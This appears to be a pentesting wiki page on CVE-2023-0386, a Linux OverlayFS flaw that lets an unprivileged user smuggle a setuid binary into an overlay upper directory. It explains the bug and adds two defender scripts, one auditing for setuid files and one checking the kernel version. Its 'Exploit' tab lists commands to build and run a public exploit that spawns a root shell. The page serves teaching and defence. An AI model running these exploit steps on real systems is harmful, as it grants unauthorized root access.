# CVE-2023-0386

## Theory

The overlay file system (often abbreviated as OverlayFS) allows a user to "merge" several mount points into a unified file system.

CVE-2023-0386 stems from the kernel's OverlayFS copy-up path: when a file was copied from a "lower" layer to the "upper" directory, the kernel did not check whether the user and group owning that file were mapped in the current [user namespace](https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-2/#user-namespace). An unprivileged user could therefore use OverlayFS as an intermediary to smuggle an SUID binary from a "lower" directory into the "upper" directory.

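The artefact this bug leaves behind is a setuid/setgid file sitting in an overlay "upper" directory, so that is what a defender can look for. The following audit script is an added example (not from the original page and not from any exploit project): it parses `/proc/self/mountinfo` for overlay mounts, pulls out each `upperdir=` option and lists setuid/setgid regular files underneath. It assumes Linux with `/proc` mounted and POSIX `sh`, `awk` and `find`; the embedded mountinfo sample is constructed, not captured from a real host.

```bash
#!/bin/sh
# Added example, not part of the original page: a defender-side audit for the
# artefact CVE-2023-0386 leaves behind, a setuid/setgid file sitting in an
# overlay "upper" directory. Assumes Linux with /proc mounted, POSIX sh, awk, find.

# Print every upperdir= path from text in /proc/self/mountinfo format (stdin).
# Each line looks like: ... - <fstype> <source> <superopts>
overlay_upperdirs() {
  awk '
    index($0, " - overlay ") {
      sub(/^.* - /, "")              # keep "<fstype> <source> <superopts>"
      n = split($3, o, ",")
      for (i = 1; i <= n; i++)
        if (sub(/^upperdir=/, "", o[i])) print o[i]
    }'
}

# List setuid/setgid regular files below a directory, staying on one filesystem.
find_setuid_in() {
  find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Audit the overlay mounts listed in a mountinfo file (default: this process's).
# Findings go to stdout, one path per line; no output means nothing was found.
audit_overlay_upperdirs() {
  overlay_upperdirs < "${1:-/proc/self/mountinfo}" | while IFS= read -r dir; do
    if [ -d "$dir" ]; then find_setuid_in "$dir"; fi
  done
  return 0
}

# Constructed sample (not captured from a real host) in mountinfo format.
SAMPLE_MOUNTINFO='24 1 8:1 / / rw,relatime - ext4 /dev/sda1 rw
98 24 0:45 / /tmp/ovl/merged rw,relatime - overlay overlay rw,lowerdir=/tmp/ovl/lower,upperdir=/tmp/ovl/upper,workdir=/tmp/ovl/work
99 24 0:46 / /proc rw,nosuid,nodev,noexec - proc proc rw'

# Stand-alone run: show the parser on the sample, then audit this host.
printf '%s\n' "$SAMPLE_MOUNTINFO" | overlay_upperdirs     # -> /tmp/ovl/upper
audit_overlay_upperdirs
```

Run it periodically or from a file-integrity job: on a healthy host an overlay upper directory should not grow a setuid binary on its own, so any hit is worth correlating with the user who mounted the overlay.
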
## Practice

{% tabs %}
{% tab title="Enumerate" %}
The target system is likely to be vulnerable if it has a kernel version lower than 6.2.

```bash
# Get kernel version
$ uname -r
5.15.70-051570-generic
```
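
Comparing `uname -r` against "6.2" by hand is easy to get wrong, because a plain string comparison sorts "5.9" after "5.15". The script below is an added example (not from the original page) that does the comparison numerically; it assumes POSIX `sh` and `sed`. Caveat: distribution kernels backport fixes without changing the upstream version string, so a hit means "check the distribution's advisory", not "confirmed vulnerable".

```bash
#!/bin/sh
# Added example, not part of the original page: numeric check for the
# "kernel lower than 6.2" rule. Distribution kernels backport fixes without
# changing the upstream version, so treat a hit as "investigate". POSIX sh, sed.

# Print "MAJOR MINOR" for a release string such as "5.15.70-051570-generic";
# a missing minor is treated as 0.
major_minor() {
  v=$(printf '%s' "$1" | sed 's/[^0-9.].*//')
  case "$v" in
    *.*) r=${v#*.}; printf '%s %s\n' "${v%%.*}" "${r%%.*}" ;;
    *)   printf '%s 0\n' "$v" ;;
  esac
}

# kernel_below THRESHOLD [RELEASE]: succeed (exit 0) when RELEASE (default:
# the running kernel) is numerically older than THRESHOLD, e.g. 6.2.
kernel_below() {
  set -- $(major_minor "$1") $(major_minor "${2:-$(uname -r)}")
  # $1 $2 = threshold major/minor, $3 $4 = release major/minor
  [ "$3" -lt "$1" ] || { [ "$3" -eq "$1" ] && [ "$4" -lt "$2" ]; }
}

# Stand-alone run against the kernel this script executes on.
if kernel_below 6.2; then
  echo "$(uname -r): below 6.2, check the distribution advisory for CVE-2023-0386"
else
  echo "$(uname -r): 6.2 or newer"
fi
```
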

{% endtab %}

{% tab title="Exploit" %}
Using [this exploit](https://github.com/sxlmnwb/CVE-2023-0386) by sxlmnwb, we can abuse CVE-2023-0386.

```bash
# Compile
git clone https://github.com/sxlmnwb/CVE-2023-0386 && cd CVE-2023-0386
make all
```

Start two terminals on the target. In the first one, run:

```bash
./fuse ./ovlcap/lower ./gc
```

In the second terminal, run the following; it will spawn a root shell.

```bash
./exp
```

{% hint style="info" %}
If the target doesn't have gcc installed, you may need to recreate a similar virtual environment to compile the exploit.
{% endhint %}
{% endtab %}
{% endtabs %}

## References

{% embed url="https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/" %}
